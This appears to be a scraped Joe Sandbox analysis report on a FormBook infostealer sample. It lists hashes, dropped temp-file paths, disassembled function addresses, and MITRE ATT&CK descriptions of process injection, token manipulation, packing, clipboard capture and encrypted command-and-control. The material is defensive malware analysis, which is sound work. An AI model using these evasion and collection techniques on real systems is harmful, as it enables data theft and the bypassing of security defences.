__cftog_l.LIBCMT ref: 002EA997
__cftoe_l.LIBCMT ref: 002EA9C9

Memory Dump Source

Source File: 00000001.00000002.233540686.00000000002E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000001.00000002.233535949.00000000002E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233550962.00000000002EE000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233556716.00000000002F3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233561593.00000000002F7000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e0000_miylwnpd.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 98c1d814dc1bc2c5b5dd0064382151b4008e75188156968a128734ce436507f3
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: F301403249018EFBCF125F95CC518EE3F22BB18354F998515FE1958032D336E9B1AB92

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.17207

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\miylwnpd.exe

C:\Users\user\AppData\Local\Temp\nsaF211.tmp

C:\Users\user\AppData\Local\Temp\qaodb6jx48te

C:\Users\user\AppData\Local\Temp\zehirtbl

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Windows Analysis Report
SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.17207

Function 00403646 Relevance: 91.4, APIs: 34, Strings: 18, Instructions: 450
stringfilecomCOMMON

Function 00405D7A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 004069A4 Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Function 004040CB Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Function 00403D1D Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 004030D0 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 202
memoryCOMMON

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Function 0040347F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 101
COMMON

Function 004069CB Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00405B9F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Function 0040618D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Function 00403C2B Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20
COMMON

Function 00403377 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88
COMMON

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Function 00405D32 Relevance: 4.5, APIs: 3, Instructions: 28
fileCOMMON

Function 00406AE6 Relevance: 4.5, APIs: 3, Instructions: 27
synchronizationCOMMON

Function 00406045 Relevance: 3.0, APIs: 2, Instructions: 47
stringCOMMON

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Function 00405C51 Relevance: 3.0, APIs: 2, Instructions: 24
processCOMMON

Function 00406A3B Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Function 0040615E Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Function 00406139 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Function 00405C1C Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Function 00406210 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Function 004061E1 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Function 004035FE Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37
COMMON

Function 0040580F Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Function 00404ABB Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275
stringCOMMON

Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
comCOMMON

Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Function 00405037 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489
windowmemoryCOMMON

Function 00404789 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204
windowstringCOMMON

Function 004062B4 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130
memorystringCOMMON